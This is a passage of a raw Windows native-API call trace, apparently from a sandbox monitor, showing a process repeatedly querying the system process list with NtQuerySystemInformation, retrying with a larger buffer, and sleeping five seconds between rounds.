BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.187] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.202] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.220] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.235] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.250] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.273] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.282] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.298] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.313] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.328] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.345] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.360] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.375] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.392] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.406] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.423] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.438] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.454] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.468] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.484] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.501] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 